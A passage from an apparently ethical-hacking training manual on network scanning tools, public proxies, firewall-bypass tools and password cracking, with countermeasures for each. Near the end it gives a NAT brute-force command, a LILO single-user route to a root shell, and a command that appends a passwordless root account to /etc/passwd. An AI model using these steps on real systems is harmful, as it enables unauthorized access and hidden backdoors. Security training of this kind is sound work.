determine which ports are open. Neither UDP packets, nor the ICMP errors are
guaranteed to arrive, so UDP scanners of this sort must also implement retransmission
of packets that appear to be lost (or you will get a bunch of false positives
3.23.1 Tool: ipEye, IPSecScan
Figure 3.15
_______________________________________________________________________________________
IPSecScan is a tool that can scan either a single IP address or a range of IP addresses
looking for systems that are IPSec enabled.
3.23.2 Tool: NetScan Tools Pro 10
Figure 3.16
NetScanTools Pro is an ideal tool for the network security, network
administration, network training, internet forensics and law enforcement internet
crimes fields.
**Automated tools are started interactively by the user. By Automated we mean that
several tools are used to do research, then the results are presented in your web
browser.
NetScanTools Pro Benefits
Saves time when you need to gather information about Internet or local LAN
users, network devices, IP addresses, ports, and many other network specifics.
Removes the guess-work from Internet investigation by automating research
requiring multiple network tools.
_______________________________________________________________________________________
Produces clear, concise results reports in the format that you prefer - web page
or a file easily imported by a spreadsheet.
Greatly enhances many standard network tools.
Multiple Solutions in one package
A Network Information Gathering, Reconnaissance and Discovery Solution
Gather information from DNS. Use DNS Checking and Testing tools such as
NSLOOKUP or Dig along with any of 43 record query options. Check zone
transfers with List Domain or Dig w/AXFR. DNS Validation (IP to Hostname to IP
mapping check) is found in both the NSLOOKUP and HyperTrans tools. Test
Default Servers to verify that all name servers that your computer talks with are
responding.
Find information about domain name registrations and IPv4 address
assignments fast with our advanced whois and rwhois query tool that features
automatic whois server selection.
Locate active devices in an IPv4 range using our ping sweep utility called
NetScanner. It combines a ping sweep utility with DNS queries and NetBIOS
queries.
Locate active devices in your local network segment using ARP Scan. All
active IPv4 devices must respond to ARP request packets.
Find visible and hidden shares in a Microsoft Windows Domain. NetBIOS
share detection shows visible and hidden shares. It also does a 'writable' share
test find shares subject to attacks by worms and viruses.
Find open TCP or UDP ports. The Port Scanner tool uses several different
methods to determine if a TCP or UDP port is active (used by a service or
daemon) on a target machine.
Test DHCP Server offerings and find rogue DHCP Servers. DHCP Server
Discovery finds rogue or mis-configured DHCP servers.
Find the route packets are taking from your machine to a target machine.
Traceroute includes the firewall penetrating TCP traceroute plus standard ICMP
and UDP traceroute methods.
_______________________________________________________________________________________
Validate an Email Address. Email Address Validation assists in verifying an
email address status.
Test an SMTP Server by sending mail and checking for an Open Relay.
Open SMTP Relay Checking assist in showing configuration issues with SMTP
servers.
Capture Packets from the network. Packet Viewer captures packets going
through your wired ethernet card. This program has the ability to preserve packet
data for future analysis and export packet captures to other programs like
WireShark.
Gather data using SNMP. SNMPv1/v2c tools include walk, get, set and several
advanced queries such as remote ARP cache, remote listening ports and more.
A new SNMP Dictionary Attack tool uses a common password dictionary to
guess the community name of an SNMP enabled device.
Find and keep track of IP/MAC Address Mappings. IP and MAC address
associations found using NetScanner, ARP, SNMP, and NetBIOS can be
automatically updated and maintained in the IP/MAC address management
database.
Numerous useful utilities like Subnet Calculator, TTCP for network speed
checking, Ping, ARP Ping, and safe URL web page capture with obscured URL
decoding.
Map Network Switches. The optional Manage Switch Port Mapping tool works
with many SNMP enabled managed ethernet network switches.
_______________________________________________________________________________________
3.23.3 Tool: NMap (Network Mapper)
Figure 3.17
Nmap was the source of strange new scan patterns started being detected by the
SHADOW ID Systems located throughout the Internet. The reported traffic varies from
incident to incident. However, it can generally be categorized into two distinct groups.
The first group is denoted as the "random scan" category. This scan’s signature is
characterized by SYN packets sent to apparently random destination (or service) ports
over some discreet range of values. At the end of these scans we typically see several
packets to high numbered tcp and udp ports, followed by a small number of packets to a
common destination port.
The second class of traffic is called (for the lack of a better term) "exploits plus".
Although the signature of these probes can vary with respect to the service ports
accessed, the basic characteristics closely resemble the random scan discussed above.
_______________________________________________________________________________________
3.24 Active Stack Fingerprinting___________________
#
#
#
#
Fingerprinting is done to determine the remote OS
Allows attacker to leave smaller footprint and have greater chance to succeed
Based on the fact that various OS vendors implement the TCP stack differently
Specially crafted packets sent to remote OS and response is noted. This is
compared with a database to determine the OS
3.25 Passive Fingerprinting_______________________
#
#
#
Passive fingerprinting is also based on the differential implantation of the stack
and the various ways an OS responds to it.
However, instead of relying on scanning the target host, passive fingerprinting
captures packets from the target host and study it for tell tale signs that can
reveal theOS.
Passive fingerprinting is less accurate than active fingerprinting.
3.26 Hacking Tool: Cheops_______________________
Here are some of the features currently integrated into cheops:
Multiple Pages: Organize your network into convenient pages
so you can place relevant portions together, and quickly go to a
specific area or specific network.
OS Detection: Cheops can optionally determine the OS
of hosts on the network, selecting appropriate icons for
them.
Find: Quickly find hosts on a large network
_______________________________________________________________________________________
Mapping: Cheops can show you the routes taken to access areas of your network.
(This feature is designed for larger networks, with
routers, subnets, etc. If you only have a simple LAN
where all your hosts are connected with hubs, then
it'll just draw a bunch of lines between you and the
other computers) This mapping not only makes
heirarchy clearer, but can show unusual routing
issues, like this unusual router triangle.
Unfortunately, you have to place the machines
yourself, but cheops handles the interconnections :)
Services: Right clicking on a host quickly shows
you a list of common services it supports, and rapid,
easy access to them.
Multiple views: For large networks, you can
view the network with smaller icons, or even as
a simple list of networks. Layout is arrangeable
by domain, hostname, IP address, etc and
searching is supported in both iconic and list
formats.
Generalized Port Scanner: Cheops includes a generalized TCP port scanner to see
what ports on your network are in use.
_______________________________________________________________________________________
Service probing: Retrieve version information for certain services, to be sure any given
host is up-to-date with the latest revision of its services.
Highly Configurable: Cheops is highly
configurable both through text-based
configuration files and through a graphical
"Options" dialog box
in
via
Integrated SNMP support: Cheops
includes a simple integrated SNMP browser,
including write capability, using the UCD SNMP
library. Cheops also supports a plugin interface,
which includes support for SNMP plugins, similar
concept to those of HP Open view
Monitoring support: Cheops can monitor your
critical servers, and immediately notify you
through its event log, standard e-mail, and soon
paging, when things go wrong. Know exactly
what's up or down, and just when problems occur
_______________________________________________________________________________________
3.28 Proxy Servers______________________________
Proxy is a network computer that can serve as an intermediate for connection with other
computers. They are usually used for the following purposes:
#
#
#
#
#
As firewall, a proxy protects the local network from outside access.
As IP-addresses multiplexer, a proxy allows to connect a number of computers to
Internet when having only one IP-address
Proxy servers can be used (to some extent) to anonymize web surfing.
Specialized proxy servers can filter out unwanted content, such as ads or
'unsuitable' material.
Proxy servers can afford some protection against hacking attacks.
3.28.1 LIST OF FREE PROXIES ON WEB
Name port type country last test whois
Anonymity level
Checked
time
213.161.94.210:80
anonymous proxy server
Oct-15, 14:53
United Kingdom
195.56.55.71:8080
Oct-15, 14:51
Hungary
220.189.250.86:8080
anonymous proxy
Oct-15, 14:52
China
201.76.67.194:3128
anonymous proxy
Oct-15, 14:51
Brazil
84.240.51.34:80
Oct-15, 14:49
Lithuania
125.93.0.228:8080
Oct-15, 14:48
China
203.158.218.65:8080 anonymous proxy server
Oct-15, 14:49
Thailand
221.120.211.2:8080
Anonymous
Oct-15, 14:51
Pakistan
195.83.230.243:80
anonymous proxy
Oct-15, 14:57
France
82.113.142.57:8080
Anonymous
Oct-15, 14:47
United Kingdom
222.255.29.44:8888
anonymous proxy
Oct-15, 14:31
Vietnam
219.132.71.131:8080
anonymous proxy
Oct-15, 14:53
China
218.107.54.224:8080
anonymous server
Oct-15, 14:57
China
83.215.244.42:3128
anonymous proxy
Oct-15, 14:01
Austria
IP address
Country
_______________________________________________________________________________________
200.55.208.203:80
anonymous proxy
Oct-15, 14:58
Chile
88.191.60.104:3128
anonymous proxy
Oct-15, 14:45
France
222.255.29.42:8888
anonymous server
Oct-15, 14:38
Vietnam
193.226.85.218:80
anonymous proxy
Oct-15, 14:44
Romania
82.95.108.221:8080
anonymous server
Oct-15, 14:59
Netherlands
218.50.52.210:80
anonymous server
Oct-15, 14:43
Korea, Republic
of
195.97.171.76:80
anonymous proxy
Oct-15, 14:53
Denmark
210.18.188.225:6588
high-anonymous proxy
server
Oct-15, 13:05
India
61.153.145.106:3128
high-anonymous
Oct-15, 13:03
China
206.51.224.46:80
server
Oct-15, 14:48
United States
202.75.35.213:3128
Oct-15, 13:07
Malaysia
3.29 Anonymizers_______________________________
Anonymizers are services that help make your own web surfing anonymous.
The first anonymizer developed was Anonymizer.com created in 1997 by Lance Cottrell.
An anonymizer removes all the identifying information from a user’s computers while the
user surfs the Internet, thereby ensuring the privacy of the user. Whenever you surf the
Web, you leave yourself open to being snooped upon by web sites. They can track your
online travels, know what operating system and browser you're running find out your
machine name, peer into your clipboard, uncover the last sites you've visited, examine
your history list, delve into your cache, examine your IP address and use that to learn
basic information about you such as your geographic location, and more.
3.30 Bypassing Firewall using Httptunnel___________
Httptunnel creates a bidirectional virtual data path tunneled in HTTP requests. The
requests can be sent via an HTTP proxy if so desired.
_______________________________________________________________________________________
Figure 3.18
3.30.1 Hacking Tool: HTTPort
Enter your proxy address and port here. “Your proxy” is the one that you use for surfing,
and which actually blocks you from the Internet. If you don’t know what your proxy is,
examine your browser settings.
HTTPort allows you to bypass an HTTP proxy, which is blocking you from the Internet.
With HTTPort you may use the following software (just a sample list, not limited to !)
from behind an HTTP proxy: e-mail, IRC,ICQ, news, FTP, AIM, any SOCKS capable
software, etc.
_______________________________________________________________________________________
Figure 3.19
Figure 3.20
_______________________________________________________________________________________
3.31 Summary__________________________________
#
#
#
#
War dialing is the term given to accessing a network illegally over a compromised
phone line. Popular tools include THC war dialer and phone sweep.
Scanning is a method adopted by administrators and crackers alike to discover
more about a network
There are various scan types - SYN, FIN, Connect, ACK, RPC, Inverse Mapping,
FTP Bounce, Idle Host etc. The use of a particular scan type depends on the
objective at hand.
Ways to subvert a standard connection include HTTPort, HTTP tunneling, using
proxies, SOCKS chains and anonymizers.
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-4
Operating System Attacks
Session Objectives:
Windows Vulnerabilities
Password Vulnerabilities
Technical Password Vulnerabilities
Cracking Passwords
Password Cracking Software
Dictionary Attacks
Brute-Force Attacks
Cracking Password with LOPTH Crack
Obtaining the Password Hashes
General Password-Hacking Countermeasures
Linux Vulnerabilities
_______________________________________________________________________________________
Introduction____________________________________
The Microsoft Windows OS family (with such versions as NT, 2000, XP, and Server
2003) is the most widely used OS in the world. It’s the most widely hacked as well on
the other side. Is this because Microsoft doesn’t care as much about security as other
OS vendors? The short answer is no. Sure, numerous security flaws were overlooked —
especially in the Windows NT days — but because Microsoft products are so pervasive
throughout networks, Microsoft is the easiest vendor to pick on, and often it’s Microsoft
products that end up in the crosshairs of hackers. This is the same reason that you see
so many vulnerability alerts on Microsoft products. The one positive about hackers is
that they’re driving the requirement for better security!
Many security flaws in the headlines aren’t new. They’re variants of vulnerabilities that
have been around for a long time in UNIX and Linux, such as the RPC vulnerabilities
that the Blaster worm used. You’ve heard the saying “the more things change, the more
they stay the same.” That applies here, too. Most Windows attacks are prevented if the
patches were properly applied. Thus, poor security management is often the real reason
Windows attacks are successful, yet Microsoft takes the blame and must carry the
burden.
4.1 Windows Vulnerabilities_______________________
Given the general ease of use of Windows, its enterprise-ready Active Directory service,
and the feature-rich .NET development platform, many organizations have moved to the
Microsoft platform for their networking needs. Many businesses — especially the small
to medium-sized ones — depend solely on the Windows OS for network usage. Many
large organizations run critical servers such as Web servers and database servers on
the Windows platform. If security vulnerabilities aren’t addressed and managed
Properly, they can bring a network or an entire organization to its knees. When Windows
and other Microsoft software are attacked — especially by a widespread Internet-based
worm or virus — hundreds of thousands of organizations and millions of computers are
affected. Many well-known attacks against Windows can lead to
Leakage of confidential information, including files being copied and credit card
numbers being stolen
Passwords being cracked and used to carry out other attacks
Systems taken completely offline by DoS attacks
Entire databases being corrupted or deleted
Password hacking is one of the easiest and most common ways that hackers obtain
from unauthorized computer or network access. Although strong passwords that are
difficult to crack (or guess) are easy to create and maintain users often neglect this.
Therefore, passwords are one of the weakest links in the information-security chain.
_______________________________________________________________________________________
Passwords rely on secrecy. After a password is compromised, its original owner isn’t the
only person who can access the system with it. That’s when bad things start happening.
Hackers have many ways to obtain passwords. They can glean passwords simply by
asking for them or by looking over the shoulders of users as they type them in. Hackers
can also obtain passwords from local computers by using password-cracking software.
To obtain passwords from across a network, hackers can use remote cracking utilities or
network analyzers.
4.2 Password Vulnerabilities______________________
When you balance the cost of security and the value of the protected information, the
combination of user ID and secret password is usually adequate.
However, passwords give a false sense of security. The bad guys know this and attempt
to crack passwords as a step toward breaking into computer system.
Organizational password vulnerabilities: It’s human nature to want convenience. This
makes passwords one of the easiest barriers for an attacker to overcome. Almost 3
trillion (yes, trillion with at and 12 zeros) eight-character password combinations are
possible by us in the 26 letters of the alphabet and the numerals 0 through 9. However,
most people prefer to create passwords that are easy to remember. Users like to use
such passwords as “password,” their login name, or a pet’s name.
Unless users are educated and reminded about using strong passwords, their
passwords usually are
Weak and easy to guess.
Seldom changed.
Reused for many security points. When bad guys crack a password, they try to
access other systems with the same password and user name.
Written down in non-secure places. The more complex a password is, the more
difficult it is to crack. However, when users create more complex passwords,
they’re more likely to write them down. Hackers can find these passwords and
use them against you.
4.3 Technical password vulnerabilities______________
You can often find these serious technical vulnerabilities after exploiting organizational
password vulnerabilities:
Weak password-encryption schemes. Hackers can break weak password storage
mechanisms by using cracking methods that I outline in this chapter. Many
vendors and developers believe that passwords are safe from hackers if they
don’t publish the source code for their encryption algorithms. Wrong! A persistent,
patient hacker can usually crack this security by obscurity fairly quickly.
_______________________________________________________________________________________
After the code is cracked, it is soon distributed across the Internet and becomes
public knowledge.
Password-cracking utilities take advantage of weak password encryption. These
utilities do the grunt work and can crack any password, given enough time and
computing power.
Software that stores passwords in memory and easily accessed databases.
End-user applications that display passwords on the screen while typing.
4.4 Cracking Passwords__________________________
Password cracking is one of the most enjoyable hacks for the bad guys. It fuels their
sense of exploration and desire to figure things out. You may not have a burning desire
to explore everyone’s passwords, but it helps to approach password cracking with this
thinking. So where should you start hacking the passwords on your systems? Generally
speaking, any user’s password works. After you obtain one password, you can obtain
others — including administrator or root passwords. Administrator passwords are the
pot of gold. With unauthorized administrative access, you can do virtually anything on
the system. When looking for your organization’s password vulnerabilities, I recommend
first trying to obtain the highest level of access possible (such as administrator) through
the most discreet method possible. That’s what the hackers do.
4.4.1 Cracking passwords the old-fashioned way
A hacker can use low-tech methods to crack passwords. These methods include using
social-engineering techniques, shoulder surfing, and simply guessing passwords from
information that you know about the user.
4.4.2 Social engineering
The most popular low-tech method is social engineering. Social engineering takes
advantage of the trusting nature of human beings to gain information that can later be
used maliciously.
4.4.2.1 Techniques
To obtain a password through social engineering, you just ask for it. For example, you
can simply call a user and tell him that he has some important looking e-mails stuck in
the mail queue and you need his password to log in and free them up. This is how
hackers try to get the information! If your colleague gives you his password, make sure
that he changes it.
4.4.2.2 Countermeasures
User awareness is the best defense against social engineering. Train users to spot
attacks (such as suspicious phone calls or deceitful e-mails) and respond effectively.
_______________________________________________________________________________________
Their best response is to not give out any information and to alert the appropriate
information-security officer in the organization to see whether the inquiry is legitimate
and whether a response is necessary. For this defense to be successful, the
organization must enforce a security policy and provide ongoing security-awareness
training to users.
4.4.3 Shoulder surfing
Shoulder surfing is an effective, low-tech password hack.
4.4.3.1 Techniques
To mount this attack, you must be near the user and not look obvious. Simply watch
either the user’s keyboard or screen when logging in. A hacker with a good eye may
watch whether the user is glancing around his desk for either a reminder of the
password or the password itself.
Encourage users to be aware of their surroundings and not enter their passwords when
they suspect that someone is looking over their shoulder. Instruct users that if they
suspect someone is looking over their shoulder while they’re logging in, they should
politely ask the person to look away.
4.5 Inference
Inference is simply guessing passwords from information you know about users — such
as their date of birth, favorite television show, and phone numbers. It sounds silly, but
you can determine passwords by guessing!
The best defense against an inference hack attack is to educate users about creating
secure passwords that do not include information that can be associated with them. You
can’t easily enforce this practice with technical controls, so you need a sound security
policy and ongoing awareness training to remind users of the importance of secure
password creation.
4.5.1 Weak authentication
Hackers can obtain — or simply avoid having to use — passwords by taking advantage
of older operating systems, such as Windows 9x and Me. These operating systems
don’t require passwords to log in.
4.5.2 Bypassing authentication
On a Windows 9x or similar workstation that’s prompting for a password, you can press
Esc on the keyboard to get right in.
_______________________________________________________________________________________
After you’re in, you can find other passwords stored in such places as dial-up
networking connections and screen savers. These weak systems can serve as trusted
machines — meaning that it’s assumed that they’re secure — and provide good
launching pads for network-based password attacks as well.
4.5.3 Countermeasures
The only true defense against this hack is to not use operating systems that employ
weak authentication. To eliminate this vulnerability, upgrade to Windows XP, or use
Linux or the flavors of UNIX, including Mac OS X.
More modern authentication systems (such as Kerberos, which is used in newer
versions of Windows), directory services (such as Novell’s e-Directory), and networkbased e-mail systems (such as Exchange) encrypt user passwords or don’t
communicate the passwords across the network. These measures create an extra layer
of security, but these authentication systems still have some vulnerability, which will be
discussed shortly.
4.6 High-Tech Password Cracking_________________
High-Tech Password Cracking involves using a program that tries to guess a password
by determining all possible password combinations. These high-tech methods are
mostly automated after you access the computer and password database files.
4.7 Password Cracking Software___________________
You can try to crack your organization’s operating-system and Internet application
passwords with various password cracking tools:
LC5 (previously called L0phtcrack) can sniff out password hashes from the wire.
Go to www.atstake.com/research/lc
NetBIOS Auditing Tool (NAT) specializes in network-based password attacks. Go
to www.securityfocus.com/tools/543
Chknull (www.phreak.org/archives/exploits/novell) for Novell NetWare password
testing
These tools require physical access on the tested computer:
"
"
"
"
"
"
John the Ripper (www.openwall.com/john)
pwdump2 (razor.bindview.com/tools/desc/pwdump2_readme.html)
Crack (coast.cs.purdue.edu/pub/tools/unix/pwdutils/crack)
Brutus (www.hoobie.net/brutus)
Pandora (www.nmrc.org/project/pandora)
NTFSDOS Professional (www.winternals.com)
_______________________________________________________________________________________
Various other handy password tools exist, such as
" GetPass for decrypting login passwords for Cisco routers
(www.boson.com/promo/utilities/getpass/getpass_utility.htm)
" Win Sniffer for capturing FTP, e-mail, and other types of passwords off the
network
" Cain and Abel for capturing, cracking, and even calculating various types
of passwords on a plethora of systems (www.oxid.it/cain.html)
Password-cracking utilities take a set of known passwords and run them through a
password-hashing algorithm. The resulting hashes or an encrypted form of a data set
are then compared at lightning speed to the password hashes extracted from the
original password database. When a match is found between the newly generated hash
and the hash in the original database, the password has been cracked. It’s that simple.
Other password-cracking programs simply attempt to logon using a predefined set of
user IDs and passwords. In fact, NAT can do just that. NAT takes advantage of some
known weaknesses in Microsoft’s Server Message Block (SMB) protocol, which is
used for file and print sharing.
Try running NAT in a real-world scenario. Simply download NAT from the preceding
address, and extract it to a temporary directory on your hard drive.
NAT comes with some predefined usernames and passwords in the userlist.txt and
passlist.txt files, but you can modify them or add your own. For a quick test of a
Windows NT or 2000 machine across the network, enter this basic NAT command at a
command prompt:
nat -u userlist.txt -p passlist.txt IP_address_of_uthe_computer_you’re_testing
Figure shows the output of my test server when I ran NAT against it. NAT used the
default password list to crack the administrator password in just a few seconds. If you
don’t have any luck, consider using one of the dictionary files listed in the next section.
Just give the test some time. If you use one of the larger lists, the process may take
quite a while.
_______________________________________________________________________________________
Figure 4.1
Passwords are typically stored on a computer in an encrypted fashion, using an
encryption or one-way hash algorithm such as DES or MD5. Hashed passwords are
then represented as fixed-length encrypted strings that always represent the same
passwords with exactly the same strings. These hashes are irreversible for all practical
purposes, so passwords can never be decrypted.
Password storage locations vary by operating system:
4.8 Windows usually stores passwords in these
locations:
• Security Accounts Manager (SAM) database
(c:\winnt\system32\config)
• Active Directory database file that’s stored locally or spread across domain controllers
(ntds.dit)
Windows sometimes stores passwords in either a backup of the SAM file in the
c:\winnt\repair directory or on an emergency repair disk.
Some Windows applications store passwords in the Registry or as plaintext files on the
hard drive!
_______________________________________________________________________________________
4.9 Linux and other UNIX variants typically store
passwords in these files:
• /etc/passwd (readable by everyone)
• /etc/shadow (accessible by root only)
• /etc/security/passwd (accessible by root only)
• /.secure/etc/passwd (accessible by root only)
Two high-tech password-cracking methods are dictionary attacks and bruteforce
attacks.
4.10 Dictionary attacks___________________________
Dictionary attacks against passwords quickly compare a set of words —including many
common passwords — against a password database. This database is a text file with
thousands of words typically listed in alphabetical order. For instance, suppose that you
have a dictionary file that you downloaded from one of the sites in the following list. The
English dictionary file at the Purdue site contains one word per line starting with 10th,
1st . . . all the way to zucchini and zygote.
Many password-cracking utilities can use a separate dictionary that you create or
download from the Internet. Here are some popular sites that house dictionary files and
other miscellaneous word lists:
ftp://ftp.cerias.purdue.edu/pub/dict
ftp://ftp.ox.ac.uk/pub/wordlists
packetstormsecurity.nl/Crackers/wordlists
www.outpost9.com/files/WordLists.html
Most dictionary attacks are good for weak (easily guessed) passwords. However, some
special dictionaries have common misspellings of words such as pa$$w0rd (password)
and 5ecur1ty (security), non-English words, and thematic words from religions, politics,
or Star Trek.
4.11 Brute-force attacks__________________________
Brute-force attacks can crack any password, given sufficient time. Brute-force attacks try
every combination of numbers, letters, and special characters until the password is
discovered. Many password-cracking utilities let you specify such testing criteria as the
characters and password length to try.
_______________________________________________________________________________________
A brute-force test can take quite a while, depending on the number of accounts, heir
associated password complexities, and the speed of the computer that’s running the
cracking software.
Smart hackers attempt logins slowly or at random times so the failed login attempts
aren’t as predictable or obvious in the system log files. Some malicious users may even
call the IT help desk to attempt a reset of the account they’ve just locked out. This
social-engineering technique could be a major issue, especially if the organization has
no or minimal mechanisms in place to verify that locked-out users are who they say they
are.
4.12 Cracking password with LOpth Crack__________
LOphtCrack is the utility that we will be using in this section to crack the Windows NT
passwords. It is available at http://www.l0pht.com/10phtcrack
LOphtCrack is probably the most easy to use and the most effective utility available to
crack NT passwords. LC5 obtains password hashes from the operating system, and
then begins hashing possible password values. The password is discovered when there
is a match between a target hash and a computed hash. LC5 must first obtain password
hashes from the target system, and then uses various cracking methods to retrieve the
passwords.
Figure 4.2
_______________________________________________________________________________________
4.13 Obtaining the Password Hashes
Approaches to obtaining password hashes differ, depending on where the password
resides on the computer, and your ability to access them. LC5 can obtain password
hashes directly from remote machines, from the local file system, from backup tapes
and repair disks, from Active Directory, or by recovering them as they traverse the
network. Obtaining passwords over the network requires network and administrator
privileges. On systems that do not use Active Directory, or SYSKEY, you may obtain
password hashes directly from a password database file stored on the system, the SAM
file.
After obtaining the hashes LC5 will apply different cracks such as dictionary based,
hybrid crack, Pre-Computed Password Audits, brute force cracks on the hashes to get
the password.
LC5 can audit six different types of password hashes to recover a password:
1.
2.
3.
4.
5.
6.
The LM hash,
The NTLM hash,
The LM challenge response, or
The NTLM challenge response.
Unix MD5-encoded password files
Unix DES-encoded password files
4.14 General password-hacking countermeasures____
A password for one system usually equals passwords for many other systems, because
many people use the same passwords on every system they use. For this reason,
instruct users to create different passwords for different systems especially on the
systems that protect more sensitive information.
Strong passwords are important, but balance security and convenience:
You can’t expect users to memorize passwords that are insanely complex and
changed every week.
You can’t afford weak passwords or no passwords at all.
4.14.1 Storing passwords
If you have to choose between weak passwords that your users can memorize and
strong passwords that your users must write down, I recommend having readers write
down passwords and store the information securely.
_______________________________________________________________________________________
Train users to store their written passwords in a secure place — not on keyboards or in
easily cracked password-protected computer files (such as spreadsheets). Users should
store a written password in either of these locations:
A locked file cabinet or office safe
An encrypted file or database, using such tools as
" PGP (www.pgpi.org for the free open-source version or www.pgp.com
for the commercial version)
" Open-source Password Safe, originally developed by Counterpane
(passwordsafe.sourceforge.net)
4.14.2 Policy considerations
As an ethical hacker, you should show users the importance of securing their
passwords. Here are some tips on how to do that:
Demonstrate how to create secure passwords. You may want to refer to them as
pass codes or pass phrases, because people tend to take the word passwords
literally and use only words, which can be less secure.
Show what can happen when weak passwords are used or passwords are
shared.
Diligently build user awareness of social-engineering attacks.
Enforce (or encourage the use of) a strong password-creation policy that includes the
following criteria:
Use upper- and lowercase letters, special characters, and numbers.(Never use
only numbers. These passwords can be cracked quickly.)
Misspell words or create acronyms from a quote or a sentence. (An acronym is a
word created from the initials of a phrase. For example, ASCII is an acronym for
American Standard Code for Information Interchange.)
Use punctuation characters to separate words or acronyms.
Change passwords every 6 to 12 months.
Use different passwords for each system. This is especially important for
network-infrastructure hosts, such as servers, firewalls, and routers.
Use variable-length passwords. This can throw off the hackers, because hey
won’t know the required minimum or maximum length of passwords and must try
all password length combinations.
Don’t use common slang words or words that are in a dictionary.
Don’t use similar-looking characters, such as 3 instead of E, 5 instead of S, or !
instead of 1. Password-cracking programs can check for this.
Don’t reuse the same password within 12 months.
Use password-protected screen savers.
Don’t share passwords.
_______________________________________________________________________________________
Avoid storing user passwords in a central place, such as an unsecured
spreadsheet on a hard drive. This is an invitation for disaster. Use PGP,
Password Safe, or a similar program to store user passwords.
Linux — the new darling competitor to Microsoft — is the latest flavor of UNIX that
has really taken off in corporate networks. A common misconception is that
Windows is the most insecure operating system (OS). However,
Linux — and most of its sister variants of UNIX — is prone to the same security
vulnerabilities as any other operating system.
Hackers are attacking Linux in droves because of its popularity and growing usage
in today’s network environment. Because some versions of Linux are
free — in the sense that you don’t have to pay for the base operating system —
many organizations are installing Linux for their Web servers and e-mail servers in
hopes of saving money. Linux has grown in popularity for other reasons, including
the following:
Abundant resources available, including books, Web sites, and
consultant expertise.
Perception that Linux is more secure than Windows.
Unlikeliness that Linux will get hit with as many viruses (not necessarily
worms) as Windows and its applications do. This is an area where Linux
excels when it comes to security, but it probably won’t stay that way.
Increased buy-in from other UNIX vendors, including IBM and Sun
Microsystems. Even Novell is rewriting NetWare to be based on the Linux
kernel.
Growing ease of use.
4.15 Linux Vulnerabilities_________________________
Vulnerabilities and hacker attacks against Linux are affecting a growing number of
organizations — especially e-commerce companies and ISPs that rely on Linux for
many of their systems. When Linux systems are hacked, the victim organizations
can experience the same side effects as if they were running
Windows, including:
Leakage of confidential intellectual property and customer information
Passwords being cracked
Systems taken completely offline by DoS attacks
Corrupted or deleted databases
_______________________________________________________________________________________
4.15.1 Information Gathering
You can scan your Linux-based systems and gather information from both outside
(if the system is a publicly accessible host) and inside your network.
Scan from both directions so you see what the bad guys can see from both outside
and inside the network.
4.15.2 System scanning
Linux services — called daemons — are the programs that run on a system and
serve up various applications for users.
Internet services, such as the Apache Web server (httpd), telnet (telnetd),
and FTP (ftpd), often give away too much information about the system,
such as software versions, internal IP addresses, and usernames. This
information can allow a hacker to attack a known weakness in the system.
TCP and UDP small services such as echo, daytime, and chargen, are
often enabled by default and don’t need to be.
The vulnerabilities inherent in your Linux systems depend on what services are
running. You can perform basic port scans to glean information about what’s
running.
The SuperScan results in Figure 12-1 show many potentially vulnerable services
on this Linux system, including RPC, a Web server, telnet, and FTP.
Figure 4.3 Port scanning a Linux server with Super Scan.
_______________________________________________________________________________________
Although you can’t completely prevent system scanning, you can still implement the
following countermeasures to keep the bad guys from gleaning too
much information from your systems:
Protect the systems with either
o A firewall, such as netfilter/iptables (www.netfilter.org).
o A host-based intrusion-prevention application, such as PortSentry
(sourceforge.net/projects/sentrytools) now owned by Cisco Systems
(www.psionic.com) or SNARE
(www.intersectalliance.com/projects/Snare).
These security systems are the best way to prevent an attacker from gathering
information about your Linux systems.
Disable the services you don’t need, including RPC and such daemons as
HTTP, FTP, and telnet. You may very well need some of these daemons
and more — just make sure you have a business need for them. This keeps
the services from showing up in a port scan and, thus, gives an attacker
less incentive to break into your system.
Make sure the latest software and patches are loaded; if a hacker
determines what you’re running, the chances of exploitation are reduced.
4.15.4 Unneeded Services
When you know which applications are running — such as FTP, telnet, and a Web
server it’s nice to know exactly which versions are running so you can look up any of
their associated vulnerabilities and decide whether to just turn them off.
4.15.6 Searches
Several security tools can help determine vulnerabilities. These types of utilities may not
be able to identify all applications down to the exact version number, but they’re a very
powerful way of gleaning system information.
4.15.7 Vulnerabilities
Be especially mindful of these known security weaknesses in a system:
FTP — especially if it’s not properly configured — can provide a way for a
hacker to download and access files on your system.
Telnet is vulnerable to network-analyzer captures of the clear-text user
ID and password it uses.
_______________________________________________________________________________________
Old versions of send mail — the world’s most popular e-mail server —
have many security issues. Make sure send mail is patched and hardened.
R-services such as rlogin, rdist, rexecd, rsh, and rcp are especially
vulnerable to hacker attacks, as I discuss in this chapter.
4.16 Tools______________________________________
The following tools can perform more in-depth information gathering beyond port
scanning to enumerate your Linux systems and see what the hackers see:
Nmap can check for specific versions of the services loaded, as shown in
Figure. Simply run Nmap with this command-line switch:
sV
Figure 4.4
You can and should disable the unneeded daemons on your Linux systems. This is one
of the best ways to keep your Linux system secure. It’s like locking the doors and
windows in your house — the more you lock the fewer places an intruder can enter.
4.17 Unix/ Linux_________________________________
Root is nothing but sort of a super user, who has maximum privileges and can do
whatever we want to do on a system. 'Root' is to "nix what administrator is to Windows
NT. If you get root then you can practically control each and every aspect of the system.
You can, for example, remove accounts, delete files, disable daemons and even format
the entire system.
Thus, in order to get root on a Linux system with physical access using a very
basic loophole, simply follow the following steps:
_______________________________________________________________________________________
1. Boot the target system and wait for the Linux LOader (LILO) prompt to come up.
2. At the LILO prompt type 'Linux single' (without Quotes) or 'Linux 1‘ to get the root
shell where you can practically do anything.
3. Once Linux single is running you get the root shell where you can type absolutely any
command, which is accepted by the default shell on your system.
4. At this prompt, type linuxconf '. This will bring up a blue screen, which Is actually the
Linux Configuration Utility.
5. Click on Users > Root Password. This will give you access to the password lists or, in
other words, allow you to change the root password!"
If you scroll down further, you will find that you can also add new accounts with root
privileges, using the linuxconf utility.utility are certainly not a hole in Linux. It was
actually designed to help, if the root password was forgotten.
In the first method, we typed linuxconf ' in the bash shell prompt. However, we can type
the following, in order to create a new account with root privileges and without any
password:
echo “sedulity::0:0:::“>> /etc/passwd
